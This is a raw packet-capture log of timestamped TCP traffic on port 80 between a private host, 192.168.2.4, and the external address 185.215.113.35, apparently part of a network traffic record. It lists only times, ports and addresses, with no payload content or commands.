Jan 14, 2022 00:16:07.822536945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.822618008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.822788954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.822807074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.822966099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.822984934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.823106050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.857553005 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.857598066 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.857623100 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.857647896 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.857671976 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.857700109 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.857727051 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858535051 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858562946 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858587027 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858612061 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858637094 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858661890 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858688116 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858711958 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858737946 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.858763933 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.859018087 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.859045982 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.859281063 CET	80	49901	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.859405994 CET	80	49901	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.860308886 CET	49901	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.888442039 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.888689041 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.888714075 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.893218040 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.895673990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.895785093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.896476984 CET	49901	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.896680117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.896760941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.897629023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.897721052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.897833109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.897919893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898021936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898113012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898205042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898289919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898382902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898468018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898560047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898646116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898737907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898824930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.898919106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899020910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899123907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899214029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899316072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899406910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899508953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899600029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899699926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899789095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899889946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.899981022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900080919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900176048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900279045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900374889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900468111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900557041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900656939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900748014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900846958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.900939941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901040077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901129961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901236057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901320934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901412964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901499987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901591063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901678085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901770115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901854038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.901998043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902113914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902234077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902431011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902530909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902617931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902724028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902811050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.902914047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903009892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903121948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903228045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903343916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903424025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903523922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903600931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.903714895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.904109955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.904385090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.904505968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.904598951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.904709101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.904723883 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.904819965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.904933929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.905153990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.905430079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.905586004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.905746937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.905854940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.905945063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906039953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906152010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906198978 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.906405926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906522036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906605005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906702042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906785011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.906912088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907012939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907130003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907221079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907326937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907414913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907517910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907605886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907705069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907799959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.907903910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.928654909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.928756952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.928869963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.928971052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.929073095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.929158926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.929276943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.929487944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.929758072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930092096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930186987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930398941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930500984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930583954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930672884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930754900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.930912018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931020975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931109905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931196928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931289911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931372881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931459904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931541920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931626081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931713104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931794882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931880951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.931968927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932054043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932138920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932235956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932318926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932408094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932491064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932574034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932660103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932744980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932825089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932914019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.932995081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933082104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933167934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933300972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933387041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933469057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933553934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933640957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933725119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933809042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933912039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.933999062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934084892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934194088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934294939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934385061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934480906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934572935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934653997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934740067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934823990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934906960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.934994936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935080051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935161114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935295105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935380936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935460091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935550928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935631990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935719967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935803890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935889006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.935976028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936060905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936141968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936239004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936326981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936412096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936492920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936584949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936666965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936750889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936836958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.936923027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937009096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937098026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937179089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937330008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937427998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937514067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937597036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937695026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.937786102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938020945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938292027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938381910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938465118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938553095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938636065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938720942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938807964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938893080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.938975096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.946979046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947123051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947243929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947333097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947418928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947504997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947586060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947695017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947782993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947876930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.947990894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948075056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948159933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948290110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948374033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948461056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948548079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948630095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948714972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948800087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948884010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.948972940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949055910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949146032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949237108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949326038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949409008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949497938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949579954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949666977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949749947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949836969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.949927092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950028896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950118065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950207949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950490952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950589895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950684071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950799942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950891018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.950992107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951082945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951194048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951282024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951409101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951462030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951555014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951641083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951764107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951823950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.951913118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952007055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952100992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952182055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952539921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952629089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952725887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952814102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952902079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.952989101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.969716072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970007896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970171928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970393896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970505953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970597029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970693111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970778942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970879078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.970964909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971056938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971158981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971296072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971425056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971510887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971599102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971682072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971771002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971853018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.971945047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.972029924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.972517014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.972634077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.972718000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.972804070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.972899914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973006010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973109007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973197937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973311901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973397970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973496914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973588943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973685026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973772049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973860025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.973980904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.974077940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.974189043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.974394083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.974490881 CET	49902	80	192.168.2.4	185.215.113.35
